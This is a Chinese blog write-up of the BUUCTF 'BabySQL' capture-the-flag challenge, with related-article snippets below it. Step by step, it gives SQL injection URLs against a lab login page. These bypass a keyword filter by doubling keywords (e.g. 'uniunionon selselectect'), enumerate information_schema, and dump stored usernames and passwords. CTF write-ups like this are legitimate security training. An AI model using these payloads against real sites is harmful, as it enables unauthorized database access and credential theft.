BUUCTF [极客大挑战 2019] BabySQL

最新推荐文章于 2025-04-08 20:07:54 发布
最新推荐文章于 2025-04-08 20:07:54 发布
阅读量4.3k 收藏 19
点赞数 6
分类专栏: BUUCTF WEB Writeup 文章标签: 安全 SQL注入 BUUCTF 极客大挑战2019
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/105085277
版权

BUUCTF [极客大挑战 2019] BabySQL

启动靶机,打开环境:
在这里插入图片描述
尝试登陆:
在这里插入图片描述
因为前两次的题目BUUCTF 极客大挑战 2019 EasySQL 极客大挑战 2019 LoveSQL均用万能密码登陆成功,再次尝试:

/check.php
?username=admin' or '1'='1
&password=1

在这里插入图片描述
登陆失败,尝试注释掉password内容:

/check.php
?username=admin' %23
&password=1

在这里插入图片描述
登陆成功,尝试查询字段数:

/check.php
?username=admin' order by 3%23
&password=1

在这里插入图片描述
根据报错信息,可以判断出屏蔽掉了关键字:or,所以万能密码登陆失败,尝试双写绕过:

/check.php
?username=admin' oorr '1'='1%23
&password=1

在这里插入图片描述
因为存在将关键字置换为空的过滤,全部双写以绕过,查询字段数:

/check.php
?username=admin' uniunionon selselectect 1,2,3,4 %23
&password=1

在这里插入图片描述
判断出字段数为3,查询回显点位:

/check.php
?username=1' uniunionon selselectect 11,22,33 %23
&password=1

在这里插入图片描述
得到回显点位为23,查询当前数据库名及版本:

/check.php
?username=1' uniunionon selselectect 11,version(),database() %23
&password=1

在这里插入图片描述
得到数据库名为:geek,继续查询当数据库中表名:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(table_name) frfromom infoorrmation_schema.tables whwhereere table_schema=database() %23
&password=1

在这里插入图片描述
得到两个表名为:b4bsqlgeekuser,查询第一个表中的内容:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(column_name) frfromom infoorrmation_schema.columns whwhereere table_name='b4bsql' %23
&password=1

在这里插入图片描述
得到该表中的字段信息,查询usernamepassword的内容:

/check.php
?username=1' uniunionon selselectect 11,22,group_concat(concat_ws(0x7e,username,passwoorrd)) frfromom geek.b4bsql %23
&password=1

// 将1和2通过~(十六进制形式)连接
// 类似:username~password
group_concat(concat_ws(0x7e,1,2))

在这里插入图片描述
在这里插入图片描述

得到flag,完成题目

BUUCTF-Web】[极客挑战 2019]BabySQL
weixin_49298681的博客
01-05 343
1.根据提示知道sql注入有严格的过滤;再通过尝试找到绕过的方法为藏字符2.直接获得username和password 但是没有有用的信息3.通过order by的报错知晓有多少列:root =4.寻找回显点:root =>5.获得数据库基本信息:root =>6.通过information_schema数据库爆破table_name + column_names1.root =2.root =7.再根据知道的column_names去获取数据1.root =
BUUCTF之[极客挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 2039
BUUCTF之[极客挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
BUUCTF[极客挑战2019]BabySQL
weixin_45253622的博客
05-07 368
SQL注入题型 输入 admin' 123 报错;发现存在注入点和闭合方式。 我们查看字段; ?username=admin&password=123' order by 3 从报错提示可以看出,过滤掉了or字段,所以万能密码不能使用,我们试试嵌套绕过;?username=admin&password=123' oorrder by 3 ...
[极客挑战 2019]BabySQL
最新发布
2201_75522495的博客
04-08 457
这个题目还是挺有意思的,最让人烦的是不能输入空格,当然,可以用()括号代替,但是在哪加括号又非常的困扰,还是需要量尝试。但是这只显示flag的前一部分:flag{e7d1681d-ee6f-4979-a5,这是因为报错注入最多只显示32个字符。得到后面的部分:~f-4979-a545-b5f192162b71},把两张相拼即可得到完整的flag。空格被限制了,=号也是,但是()括号和like 可以绕过此限制。分别是:id,username,password。来爆库 ,显示数据库名:geek。
040统计数字字符的个数
qq_44588905的博客
11-08 393
统计数字字符的个数 描述 输入一行字符,统计出其中数字字符的个数。 输入 一行字符串,总长度不超过255。 输出 输出为1行,输出字符串里面数字字符的个数。 样例输入 Peking University is set up at 1898. 样例输出 4 具体代码 #include <iostream> #include <cstring> #include <cstdio> using namespace std; int main() { char sen[25
BUUCTFBabySQL[极客挑战 2019]
金 帛的博客
06-11 529
BUUCTF记录贴
buuctf-[极客挑战 2019]BabySQL(小宇特详解)
小宇的web博客
01-19 5310
buuctf-[极客挑战 2019]BabySQL(小宇特详解) 这里看题的话是一道SQL注入。 这里先尝试一下万能密码 这里发现它过滤了or(直接删除了or) 这里尝试进行双写 也就是oorr,这里删除了or后又重新构造了一个or 这里发现还是不行 这里先看一下双写union select 1 /check.php?username=admin&password=1 %27 ununionion seselectlect 1 %23 这里发现不是报错,而是列数不对 当列数为3的时候对
[极客挑战 2019]BabySQL 1
qq_43618536的博客
07-02 510
BUUCTF的[极客挑战 2019]BabySQL 1
BUUCTF---[极客挑战 2019]BabySQL1
2201_75556700的博客
03-03 946
1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#使用该语句查表名时发现union,select,from,where都被过滤了。8.这里没有得到flag可能是我遗漏了什么,查了资料才发现,flag可能不在我们当前这个数据库里面,想到一开始,我还没查询库名,不知道它有几个苦命,于是使用下面命令进行数据库库名查询。使用下面命令爆第一张表的字段。
buuctf web [极客挑战 2019]BabySQL
m0_46412682的博客
07-16 1053
buuctf web [极客挑战 2019]BabySQL 开始的页面 随便输入用户名和密码 sql注入,先判断有多少字段 从图中可以看到select和union被过滤了,可以用双写selselectect uniunionon还有的是’单引号和#要编码变成%27 %23,先猜测4个字段,错误 3个字段,成功 ?username=admin&password=123%27ununionion selselectect 1,2,3%20%23 爆库 ?username=admin&
buuctf Babysql
zzqzzq11的博客
08-06 292
buuctf
BUUCTF】 [极客挑战2019] BabySQL —— 清晰易懂总结好的 Writeup
algae
08-25 1041
BUUCTF】 [极客挑战2019] BabySQL Writeup0x00 考点sql 注入 双写绕过0x01 解题爆库爆表爆列 0x00 考点 sql 注入 双写绕过 replace函数,找到union和select等替换为空 双写绕过,单词中间拆开,分两半,里面藏一个完整的: union ununionion select seselectlect from frfromom where whwhereere (过滤了or) information infoorrmation 常见UR
BUUCTF-BabySQl
m0_74167420的博客
03-17 654
数据库名为geek.
BUUCTF [极客挑战 2019]BabySQL
m0_49025459的博客
05-15 620
打开环境看看,这一个登录界面 尝试万能密码无果,那么我们只能正常尝试注入,先判断列数 1' order by 1# 输入之后发生报错 发现这里or被过滤掉了 ,这里不论是写还是小写的or都被过滤了,但是在尝试双写绕过的时候成功了 username:admin' oorr '1'='1# password:123 这样我们就可以尝试又多少列了,但是我们在尝试的时候发现order,or,by都被过滤掉了,所以我们只能通过其他的方式进行测试。但是我们在测试的时候发现union,sel
BUUCTF web BabySQL
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
12-18 224
进入靶场,老办法随便输入看一下。
BUUCTF[极客挑战 2019]BabySQL
网络空间安全学习
06-25 2321
通过输入非0数字,能正常回显,0和字母不能正常回显,什么都没有显示。刚刚我们输入非0数字正常回显,0和字母不能正常的回显,猜测说明sql语句当中可能存在||运算符,只有输入非0数字,才会返回true,回显条件。可观察网页的源码信息,发现有check.php,猜测可能是登录界面时,输入账号和密码的跳转界面,提示信息。通过上面的过程我们不难发现,此时还存在过滤,from和where也被过滤,同理双写绕过。拿到该靶机,观察界面,存在登录说明存在可能SQL注入,根据题目也可得知存在SQL注入
buuctf BabySQli
qq_44111753的博客
01-02 1097
随便输入,发现一串密文,数字+写字母,概是采用base32加密 base32解密如下,有“=”,猜测是base64加密 base64解密如下 查询后台数据库username等于输入值得所有数据 后台数据库的登录逻辑概是:将输入的用户名与后台数据库中的所有用户名做比较,找出相等的,然后用这组数据的密码与用户输入的密码作比较,若相等,则登录成功 重要点:放置于后台的数据库概率是经过hash加密的 操作:在用户名框注入 1’ union select ‘admin’,加密后的密码 为了使登录成功,注入
Buuctf-[极客挑战 2019]BabySQL
m0_63563528的博客
04-12 1426
这题的难点在于不知道过滤内容有哪些,我是通过双写一个一个的试出来的:ununionion ,seselectlect,frfromom,infoorrmation,passwoorrd,whwhereere这些要双写。如此便成功找到flag。
BUUCTF WEB BabySql
qq_41696858的博客
09-03 364
题其实没什么,就是一个双写绕过waf的问题 按照常理,admin’ 123监测是否单引号闭合,直接给出注入点,且有回显 经过测试,waf过滤了or,by那么爆破列数的时候(直接输入order by 1会回显der 1): admin’ oorrder bbyy 1# 测试到4的时候会出现unknown_column,那么列数是3 -1’ ununionion selselectect 1,2,3# 下面爆破数据库,union select同样被过滤,同样双写 -1’ ununionion selselect
buuctf极客挑战2019phpeasy
03-20
### BUUCTF 2019 PHP Easy 题目分析 #### 背景介绍 BUUCTF 是国内知名的 CTF 平台之一,其题目涵盖了多种安全领域。其中 PHP 类型的题目通常涉及反序列化漏洞、输入验证不足等问题。以下是针对 **BUUCTF 2019 PHP Easy** 的可能解题思路。 --- #### 反序列化漏洞基础 在 PHP 中,`serialize()` 和 `unserialize()` 函数分别用于对象的序列化和反序列化操作。如果开发者未对用户可控的数据进行严格校验,则可能导致反序列化漏洞的发生[^1]。 通过构造恶意的对象并将其传递给程序中的 `unserialize()` 方法,攻击者可以触发预期之外的行为,例如执行任意代码或访问敏感数据。 --- #### php://filter 协议的应用 PHP 提供了一些伪协议来处理特定场景下的文件流操作。例如: - `php://input`: 获取原始 POST 数据。 - `php://filter`: 对数据流应用过滤器,常用于绕过某些防护机制或读取文件内容。 当目标环境允许使用这些伪协议时,可以通过它们实现一些有趣的操作,比如以 Base64 编码形式读取远程脚本的内容[^2]。 --- #### 字符串查找函数 mb_strpos() 该函数返回指定子字符串首次出现的位置索引。需要注意的是,默认情况下它区分小写;另外还可以自定义字符集编码参数 `$encoding` 来适配多字节字符的需求[^3]。 此知识点虽然看似简单,但在实际利用过程中可能会被用来检测是否存在非法字符或者定位注入点等位置信息。 --- #### Payload 构造实例 假设题目存在 JSON 输入解析环节,并且服务器端会对提交过来的数据结构做进一步逻辑判断。那么我们可以尝试如下 payload: ```json { "Information": { "year": "2022abc", "items": [ 0, ["a"], "c" ] } } ``` 上述例子展示了如何精心设计嵌套数组以及特殊字段组合而成的有效载荷[^4]。当然具体形态还需依据实际情况调整优化。 --- #### 综合思考与建议 基于以上理论知识和技术手段,解决此类问题的关键在于深入理解官方给出的功能模块及其潜在缺陷所在之处。同时也要善于运用各种工具辅助完成调试工作。 ---
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值